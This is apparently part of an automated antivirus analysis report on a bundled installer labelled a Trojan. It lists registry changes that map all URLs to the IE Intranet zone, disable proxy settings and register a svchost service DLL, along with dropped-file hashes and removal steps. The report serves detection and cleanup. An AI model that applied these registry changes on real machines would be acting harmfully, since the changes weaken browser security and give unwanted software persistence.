[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process regsvr32.exe:1652 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 69 1C A2 C9 1A 26 3B 47 3E CA 1B 29 4B 42 EE"

The process regsvr32.exe:512 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "44 A9 0D E9 F1 26 0F 4C 21 C5 F7 19 FE A9 DE 98"

[HKLM\System\CurrentControlSet\Services\KuaizipUpdateChecker]
"Description" = "ÃƒÂ¥Ã‚Â¿Ã‚Â«ÃƒÂ¥Ã…Â½Ã¢â‚¬Â¹ÃƒÂ¨Ã‚Â½Ã‚Â¯ÃƒÂ¤Ã‚Â»Ã‚Â¶ÃƒÂ¥Ã‚ÂÃ¢â‚¬Â¡ÃƒÂ§Ã‚ÂºÃ‚Â§ÃƒÂ¦Ã‚Â£Ã¢â€šÂ¬ÃƒÂ¦Ã…Â¸Ã‚Â¥ÃƒÂ¦Ã…â€œÃ‚ÂÃƒÂ¥Ã…Â Ã‚Â¡"

[HKLM\System\CurrentControlSet\Services\KuaizipUpdateChecker\Parameters]
"ServiceDll" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\kuaizipUpdateChecker.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"kuaizipupdatesvc" = "KuaizipUpdateChecker"

The process regsvr32.exe:3776 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "87 C4 70 18 AF 57 96 BA A9 E9 A9 F0 F5 52 A9 46"

[HKLM\System\CurrentControlSet\Services\KuaizipUpdateChecker]
"Description" = "ÃƒÂ¥Ã‚Â¿Ã‚Â«ÃƒÂ¥Ã…Â½Ã¢â‚¬Â¹ÃƒÂ¨Ã‚Â½Ã‚Â¯ÃƒÂ¤Ã‚Â»Ã‚Â¶ÃƒÂ¥Ã‚ÂÃ¢â‚¬Â¡ÃƒÂ§Ã‚ÂºÃ‚Â§ÃƒÂ¦Ã‚Â£Ã¢â€šÂ¬ÃƒÂ¦Ã…Â¸Ã‚Â¥ÃƒÂ¦Ã…â€œÃ‚ÂÃƒÂ¥Ã…Â Ã‚Â¡"

[HKLM\System\CurrentControlSet\Services\KuaizipUpdateChecker\Parameters]
"ServiceDll" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\kuaizipUpdateChecker.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"kuaizipupdatesvc" = "KuaizipUpdateChecker"

The process BaiduUpdate.exe:3784 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 2C 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "27 56 88 11 72 08 60 FD F8 60 54 85 98 54 B2 74"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5	File path
2b94c1cbe8a0554d4f4f258401f49de4	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsz3.tmp\BDMSkin.dll
5e46082f05baaf69d10b592335598a09	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsz3.tmp\InstallHelper.dll
3e9a33113d663d8bd5ed38858e669652	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsz3.tmp\Microsoft.VC80.ATL\atl80.dll
75f2a9b695ef3ef22d731f059920f636	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsz3.tmp\Microsoft.VC80.CRT\msvcm80.dll
8c53ccd787c381cd535d8dcca12584d8	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsz3.tmp\Microsoft.VC80.CRT\msvcp80.dll
1169436ee42f860c7db37a4692b38f0e	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsz3.tmp\Microsoft.VC80.CRT\msvcr80.dll
0634f04957f05644167a484eae4fee9f	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\Baidu_Setup_1.6.200.359_ftn_1050103060[1].exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):
Baidu_Setup_1.6.200.359_ftn_1050103060.exe:1216
Kuaizip_Setup_7654_1061607.exe:828
YouQian_Setup.exe:1312
KuaiZip.exe:4052
Update.exe:3744
Baidu.exe:656
Baidu.exe:2568
Baidu.exe:1412
Baidu.exe:3816
KZMount.exe:3708
KZMount.exe:3484
regsvr32.exe:1652
regsvr32.exe:512
regsvr32.exe:3776
BaiduUpdate.exe:3784
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\error-pages_x.png (89 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-checkbox-unchecked.png (361 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\349.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Base.dll (77808 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\Software.pb (9984 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\res_xiaoxizhongxin.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\iconall-1.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\arrow.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\logo_blank.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\haze.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\executor.xml (233 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\connection-error.html (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\login\login.html (6 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\png8-logo57x65.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\executor.xml (187 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Update.dll (11040 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-center-left.png (130 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\PluginSetup.xml (654 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\storm.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\msgconfig.pb (142 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\icon_xinwen.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-center-right.png (130 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\foggy.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\login_mods.js (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp\InstallHelper.dll (3616 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\sleet.png (741 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\enter.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\skinres.rdb (8 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\pack.bat (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\weixinUI.xml (345 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\request.js (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\heavy-storm.png (926 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\download-hover.png (985 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\app-error.html (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\uninst.exe (18640 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\bookmarks_z.png (7 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\light-rain.png (864 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\LocalPluginInfo.xml (4 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\executor.xml (310 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\icon_gupiao.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sandstorm.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\PluginSetup.xml (625 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\logo57x65.png (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\crash.html (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\skinres.rdb (8 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\PluginSetup.xml (612 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\overcast.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\shower.png (817 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\icon_yinyue.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\font\open-sans\OpenSans-Light-webfont.woff (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\se\icon-google.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\mod.js (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\foggy.png (663 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\appBlackList.dat (8 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\split_m.png (124 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\kuaidi.png (312 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\res_jietu.png (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\dust.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\res_weixin.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\default-icon.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\dy.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Protocol.dll (24048 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\msvcr100.dll (51648 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\executor.xml (172 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\advance.png (377 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\44.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\green_arrow_up.png (154 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\icon_bianqian.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\PluginSetup.xml (612 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\344.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\respond.min.js (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\split_m.png (925 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BaiduBugRpt.exe (13168 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\icon-circle-loading.gif (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp\Report.dll (3616 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\folder.png (276 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\404.html (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\vedio_play.png (465 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\res_yinyue.png (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\main.js (1552 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\jietuDll.dll (3312 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\AssociateWnd.rdb (1568 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\heavy-snow.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\UIHandler.dll (120372 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\icon-loading.gif (5 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\banner.png (5 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\thundershower.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\gupiaoUI.xml (336 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\heavy-snow.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-radio-unchecked.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-button-search-large.png (408 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\history_mods.js (6360 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\thundershower-with-hail.png (946 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\png8-ala.png (561 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\jietuUI.xml (347 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\Update.rdb (6624 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\layout.css (11 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\severe-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\settings_mods.js (2392 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\DD_belatedPNG_0.0.8a-min.js (6 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-top-left.png (194 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\bianqianUI.xml (346 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\pack_z.png (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-button-search.png (382 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\qq.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\moderate-rain.png (963 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\executor.xml (241 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\screensnapshot.exe (20624 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\shower.png (481 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\skinres.rdb (1856 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\super-ajax.js (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\snow-storm.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp\res\InstallWnd.zip (3616 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\loading.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\xinwenUI.xml (342 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\XiaoXiUI.xml (382 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\box-shadow.css (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\res_resou.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-close.png (170 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\366.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\snow-flurry.png (479 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\PluginMgr.dll (49664 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LogicMisc.dll (140990 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\server-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-textbox.png (588 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\msvcp100.dll (28368 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\icon-alert-ok.png (2392 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\dy.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\png8-ex.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\skinres.rdb (1856 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\aladdin.html (2 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\auto_complete\top_site.db (10128 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-searchbox-active.png (893 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\history.css (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-bottom-left.png (249 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\map.js (8 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\executor.xml (150 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\login-success.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\yinyueUI.xml (358 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\png8-iconall-1.png (197 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\gz.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\jquery-ui-1.10.4.custom.min.js (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\res\js\common.js (990 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\login.css (7 bytes)
